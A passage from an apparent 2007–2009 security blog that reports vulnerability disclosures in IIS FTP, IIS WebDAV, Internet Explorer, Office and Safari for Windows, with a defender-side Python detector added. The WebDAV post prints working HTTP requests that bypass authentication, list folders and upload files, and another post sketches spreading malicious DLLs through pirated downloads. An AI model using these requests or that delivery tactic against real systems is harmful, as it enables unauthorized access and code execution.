Posted by Trancer on Aug 31 2009
Kingcope has done it again, fully disclosing a serious 0day vulnerability in a high-profile Microsoft product – a remotely exploitable stack-based buffer overflow in the Microsoft IIS FTP server.
Vulnerable versions are Microsoft IIS 5.0 (Windows 2000) and IIS 6.0 (Windows 2003), but due to stack cookie protection (/GS), on IIS 6.0 this vulnerability is not exploitable for code execution, only for denial of service.
The original advisory by Kingcope can be found on Full-Disclosure, and the exploit can also be found on milw0rm and Exploit Database (#9541).
Mati Aharoni (muts) posted an improved version of the exploit on the BackTrack blog. His exploit uses the password value to store the payload, which allows a larger payload – Microsoft IIS FTP 5.0 Remote SYSTEM Exploit.
Also, Xavier Mertens posted an Nmap script to scan for potentially vulnerable hosts. The script checks whether the remote host runs Microsoft ftpd, whether anonymous login is allowed and whether the MKDIR command is enabled (all the preconditions for exploitation) – Detecting Vulnerable IIS-FTP Hosts Using Nmap.
I’ll keep this post up to date with interesting resources and further details about this vulnerability.
Updates:
>> HD Moore added coverage for this vulnerability to the Metasploit SVN tree – microsoft_ftpd_nlst.rb.
>> Kingcope also posted a Denial-of-Service (stack exhaustion) exploit, which affects the IIS 5.0, 5.1 and 6.0 FTP server, on milw0rm and Exploit Database (#9587).
>> Thierry Zoller wrote an overview of the vulnerability on G-SEC blog – IIS 5 & IIS 6 FTP vulnerability – information and tools.
>> Microsoft issued a security advisory (975191) for this vulnerability and published an informative post on the SRD blog – New vulnerability in IIS5 and IIS6.
>> Microsoft patched this vulnerability – MS09-053.
Categories: Vulnerabilities

Posted by Trancer on May 21 2009
Now this is a classy one: a few days ago Kingcope (Nicolaos Rangos) disclosed a remote authentication bypass vulnerability in the Microsoft IIS 6 WebDAV service. In the advisory Kingcope details some of this vulnerability's attack vectors, such as reading files within password-protected folders and listing the contents of password-protected WebDAV folders. In some server configurations it is also possible to upload files to a WebDAV-protected folder. The vulnerability exists because WebDAV fails to properly handle an alternate Unicode encoding of the character '/' (%c0%af).
This reminds me of the good old Microsoft IIS 4/5 Unicode vulnerability, which was used to mass-own the Internet back in 2000-2001. What a fun vulnerability that was ^_^.
Microsoft has released a security advisory (971492), and the SRD team published two posts clearing up many of the vulnerability's details:
More information about the IIS authentication bypass.
Answers to the IIS WebDAV authentication bypass questions.
Here’s a summary of the details so far:
- Microsoft IIS 5.0 (Windows 2000 Server), IIS 5.1 (Windows XP) and IIS 6.0 (Windows Server 2003) are vulnerable.
- Microsoft IIS 7.0 (Windows Server 2008) is safe.
- To exploit this vulnerability, the WebDAV service must be enabled.
- WebDAV is disabled by default in IIS 6.0.
- To exploit this vulnerability, the IIS server must use IIS permissions to restrict a subfolder of content to authenticated users.
- An IIS server that doesn't use IIS permissions to restrict content to authenticated users is safe.
- To exploit this vulnerability, file system access to the restricted content must be granted to the IUSR_[MachineName] account.
- An IIS server that does not grant file system access to the IUSR_[MachineName] account is safe.
- A parent folder of the private subfolder must allow anonymous access.
- The vulnerability affects websites implementing Basic, Digest, or Integrated Windows Authentication (NTLM).
- An IIS server that hosts web applications using only forms-based authentication is safe.
- If the IUSR_[MachineName] account has write access to WebDAV folders, it is possible to upload content to the web server.
- Microsoft SharePoint Server is safe.
- Microsoft Outlook Web Access (OWA) Server is safe.
Exploiting the WebDAV remote authentication bypass vulnerability
Authentication bypass of password protected folders:
http://www.vulnerable.com/webdav%c0%af/sensitive.zip
Directory listing of password protected folders:
PROPFIND /web%c0%afdav/ HTTP/1.1
Host: www.vulnerable.com
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>
Writing files to password protected folders:
PUT /web%c0%afdav/foo.html HTTP/1.1
Host: www.vulnerable.com
Translate: f
Content-Length: 15
Content-Type: text/html
<h1>w00t!!</h1>
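As an added defender-side example, not from the post, Kingcope's advisory or Microsoft: a small Python checker that percent-decodes a request path and flags the overlong UTF-8 sequence %c0%af, generalized to the three- and four-byte overlong forms of the same character that a signature matching only the literal %c0%af would miss. The sample request lines are constructed to mirror the requests shown above.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample request lines (not captured traffic), shaped like the
# GET, PROPFIND and PUT examples quoted in the post.
SAMPLE_REQUESTS = [
    "GET /webdav/sensitive.zip HTTP/1.1",
    "GET /webdav%c0%af/sensitive.zip HTTP/1.1",
    "PUT /web%e0%80%afdav/foo.html HTTP/1.1",
    "GET /web%2fdav/ HTTP/1.1",
]

def overlong_sequences(data: bytes):
    """Return (offset, sequence, decoded_char) for every overlong UTF-8 sequence
    in data: lead byte C0/C1 (always overlong), E0 with second byte below A0, or
    F0 with second byte below 90. Strict decoders reject these; IIS 5/6 WebDAV
    accepted %c0%af as '/' without the restricted folder's authentication."""
    hits, i = [], 0
    while i < len(data):
        b, n = data[i], 0
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            n = 2
        elif (b == 0xE0 and i + 2 < len(data) and 0x80 <= data[i + 1] < 0xA0
              and 0x80 <= data[i + 2] <= 0xBF):
            n = 3
        elif (b == 0xF0 and i + 3 < len(data) and 0x80 <= data[i + 1] < 0x90
              and all(0x80 <= x <= 0xBF for x in data[i + 2:i + 4])):
            n = 4
        if not n:
            i += 1
            continue
        seq = data[i:i + n]
        cp = seq[0] & (0xFF >> (n + 1))  # payload bits of the lead byte
        for c in seq[1:]:
            cp = (cp << 6) | (c & 0x3F)  # six payload bits per continuation byte
        hits.append((i, seq, chr(cp)))
        i += n
    return hits

def flag_request(line: str):
    """None if the percent-decoded request path holds no overlong sequence,
    otherwise a finding that names the first one."""
    parts = line.split(" ")
    if len(parts) < 2:
        return None
    hits = overlong_sequences(unquote_to_bytes(parts[1]))  # bytes, no charset guess
    if not hits:
        return None
    off, seq, ch = hits[0]
    return f"overlong UTF-8 {seq.hex()} for {ch!r} at byte {off} of {parts[1]}"
```

The plain %2f request is deliberately not flagged: it is a legitimate encoding of '/', and the point of the check is the overlong form the server decoded after its permission check.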
Testing tools
Further information
That’s it for now; great find by kcope indeed.
Updates:
>> Check out this blog post by Todd Manning of BreakingPoint Labs – ‘Slash’ and Burn – The IIS 6.0 WebDAV Bug – which gives interesting information about this vulnerability and about IDS/IPS signature evasion techniques.
In addition, ET added an HTTP WebDAV scanner to Metasploit – wmap_dir_webdav_unicode_bypass.rb.
From SANS ISC Diary – IIS admins, help finding WebDAV remotely using nmap.
>> From Thierry Zoller – the IIS WebDAV Unicode vulnerability also allows bypassing IP address and domain name restriction configurations. This keeps getting better and better… :-)
>> WebDAV unicode vulnerability overview by Steve Friedl – Understanding Microsoft’s KB971492 IIS5/IIS6 WebDAV Vulnerability.
>> Microsoft patched the IIS WebDAV Unicode authentication bypass vulnerability – MS09-020.
It’s about time.
Categories: Vulnerabilities

Posted by Trancer on May 12 2009
A month ago, on the Black Tuesday of April 2009, Microsoft patched a handful of vulnerabilities, some of which have been known for quite some time.
In this post I’ll talk about one vulnerability in particular – the DLL-load hijacking vulnerability in Microsoft Internet Explorer 7, which was found by Aviv Raff in October 2006.
The DLL-load hijacking vulnerability causes Internet Explorer to load specific DLL files (imageres.dll, schannel.dll and sqmapi.dll) from the desktop when it runs. An attacker may leverage this to execute arbitrary code in the context of the application by placing a specially crafted DLL file on a user’s desktop.
So why did Microsoft patch a security bug only after two and a half years? Well, that’s a long story.
At first, Microsoft classified this vulnerability as a “bad behavior” bug and, despite Aviv’s warnings, did not attach any security considerations to the issue. Microsoft stated that if an attacker was able to create a specially crafted DLL file on a user’s desktop, that desktop must already have been compromised. Then in December 2006, Aviv published PoC exploit code (Exploit Database #2929) for the vulnerability on milw0rm, and still no patch from Microsoft. Even in April 2008, when Windows XP SP3 was released, Microsoft had not provided a fix or a workaround of any kind for this issue.
In May 2008, Nitesh Dhanjani detailed several vulnerabilities in Apple Safari; one of them was the “Safari Carpet Bomb” vulnerability, which enabled an attacker to force the browser to download files without the user’s consent. The default download path of Apple Safari for Windows is the user’s desktop.
Combining the DLL-load hijacking vulnerability with the Safari Carpet Bomb vulnerability, Aviv was able to demonstrate a fully automated remote code execution attack. With the help of Ryan Naraine, who together with Aviv sent Microsoft the proof-of-concept, Microsoft and Apple started taking these issues seriously. Microsoft released a security advisory for this “blended threat”, and eventually, in June 2008, Apple fixed the Safari Carpet Bomb vulnerability.
And then in April 2009, two and a half years after Aviv reported the issue, Microsoft finally patched the DLL-load hijacking vulnerability.
You can read a detailed disclosure timeline in this blog post by Aviv Raff. Further information regarding this “blended threat” can be found under CVE-2008-2540 and BID 29445.
To mitigate this issue, Microsoft released two patches:
MS09-014 – a cumulative security update for Internet Explorer. With regard to the DLL-load hijacking vulnerability, this patch modifies the way Internet Explorer loads files from the desktop.
MS09-015 – additional defense-in-depth protections. With this patch Microsoft introduced a new API, SetSearchPathMode, which sets the per-process mode used by the SearchPath function to locate files and allows applications to force the current directory to be searched only after the application and system locations.
Additional information about these patches can be found in the security bulletins and in this post on the Microsoft Security Research & Defense blog.
And now for the interesting part: what Microsoft DOESN’T want you to know.
As stated in the MS09-014 security bulletin, the DLL-load hijacking vulnerability affects Internet Explorer 7 and lower versions. Internet Explorer 8 users are immune to this vulnerability, Microsoft claims.
This statement is not true: Internet Explorer 8 (RTM, build 8.0.6001.18702) is, in fact, vulnerable to the DLL-load hijacking vulnerability. Not only that, this is not the only vulnerability patched in MS09-014 that affects Internet Explorer 8, but that’s a subject for another blog post.
Here’s a video demonstrating the attack on IE8 – ie8_dll_hijack.swf.
Also, Internet Explorer is not the only application vulnerable to the DLL-load hijacking vulnerability. Almost every Microsoft application I’ve tested is vulnerable, and so are some third-party applications. For example, Microsoft Office 2007 is vulnerable.
Here’s a video demonstrating the attack on Microsoft Office Word 2007 – office_dll_hijack.swf.
As I mentioned, at first Microsoft didn’t consider this issue a security vulnerability, because an attacker would have to create a specially crafted DLL file on a user’s computer to exploit it. Well, I can come up with many ways to leverage this attack; for example, using P2P file-sharing applications and protocols such as BitTorrent. Attackers can distribute warez (movies, software, books, etc.) packed in a ZIP or RAR file, add a malicious DLL file and a readme .html or .doc file (or both) to the package, and once the victim downloads the malicious package and opens the readme file – GAME OVER.
So, does Microsoft lie in security bulletins to its customers? They probably do… Have a happy Black Tuesday! :-)
Update (25/08/2010):
Thanks to HD Moore, DLL-load hijacking is getting a lot of media attention and tons of new exploits are being published:
– Microsoft Security Advisory (2269637) – Insecure Library Loading Could Allow Remote Code Execution
– Metasploit: Exploiting DLL Hijacking Flaws
– Better, Faster, Stronger: DLLHijackAuditKit v2
– DLL-Load Hijacking\Binary Planting on Exploit-Database
– DLL Hijacking (KB 2269637) – the unofficial list
Categories: Vulnerabilities

Posted by Trancer on Jun 12 2007
In less than 24 hours since Apple released a Windows version of the Safari web browser (v3 Beta), security researchers have already disclosed some high-risk vulnerabilities.
These are the findings so far:
- Apple Safari for Windows Unspecified Denial of Service Vulnerability by Aviv Raff (Bugtraq ID: 24431).
- Apple Safari for Windows Memory Corruption Vulnerability by David Maynor (Bugtraq ID: 24433).
- Apple Safari for Windows URL Protocol Handler Command Injection by Thor Larholm (Bugtraq ID: 24434).
- Apple Safari for Windows Unspecified SVG Parse Engine Multiple Unspecified Vulnerabilities by Tom Ferris (Bugtraq ID: 24446).
- Apple Safari for Windows Window.setTimeout Content Spoofing Vulnerability by Robert Swiecki (Bugtraq ID: 24457 – PoC).
- Apple Safari for Windows “ROWSPAN” Denial of Service (Null Pointer) Vulnerability by Yannick von Arx (Bugtraq ID: 17674 – PoC, PoC).
- Apple Safari Password Manager Cross-Site Information Disclosure Weakness (Reverse Cross-Site Request) by David Teare (Bugtraq ID: 21329 – PoC).
- Apple Safari for Windows Content and URL Bar Spoofing Vulnerability by Robert Swiecki (Bugtraq ID: 24484 – PoC).
- Apple Safari for Windows Corefoundation.DLL Denial of Service Vulnerability by Lostmon (Bugtraq ID: 24497 – PoC).
- Apple Safari for Windows Document.Location Denial of Service Vulnerability by azizov@itdefence.ru (Bugtraq ID: 24499 – PoC).
- Apple Webkit Invalid Type Conversion Remote Code Execution Vulnerability by Rhys Kidd (Bugtraq ID: 24597).
- Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability by Richard Moore of Westpoint Ltd (Bugtraq ID: 24598).
- Apple Safari Cross-Domain Race Condition Information Disclosure Vulnerability by Lawrence Lai, Stan Switzer, Ed Rowe of Adobe Systems (Bugtraq ID: 24599).
Cool, ain’t it? Here’s my 2 cents –
Apple Safari for Windows feed:// URI Denial of Service Vulnerability.

Also on:
BID 24460
OSVDB 38864
Stay tuned for more updates.
UPDATE:
SecurityFocus – Flaw hunters go off on Safari
UPDATE 2:
14/06/2007 – Apple has released a new version of Safari for Windows – v3.0.1 Beta, check the security announcement.
Additional vulnerabilities have been disclosed and reported to Apple but haven’t been fixed.
Fixed vulnerabilities:
- Bugtraq ID: 17674
- Bugtraq ID: 24431
- Bugtraq ID: 24433
- Bugtraq ID: 24434
- Bugtraq ID: 24446
- Bugtraq ID: 24457
Unfixed vulnerabilities:
- Bugtraq ID: 21329
- Bugtraq ID: 24460
- Bugtraq ID: 24484
- Bugtraq ID: 24497
- Bugtraq ID: 24499
It’s great that they respond quickly, but what’s the point of releasing a security patch without fixing all the vulnerabilities?
UPDATE 3:
22/06/2007 – Apple has released a new version of Safari for Windows – v3.0.2 Beta – security announcement.
Fixed vulnerabilities:
- Bugtraq ID: 24460
- Bugtraq ID: 24484
- Bugtraq ID: 24497
- Bugtraq ID: 24499
- Bugtraq ID: 24597
- Bugtraq ID: 24598
- Bugtraq ID: 24599
Unfixed vulnerabilities:
Apple fixed the feed:// URI DoS (NULL pointer dereference) vulnerability, found by us. It is mentioned in the release notes.
Note that Safari 3.0.2 is still vulnerable to the Reverse Cross-Site Request flaw found by David Teare.
Categories: Vulnerabilities
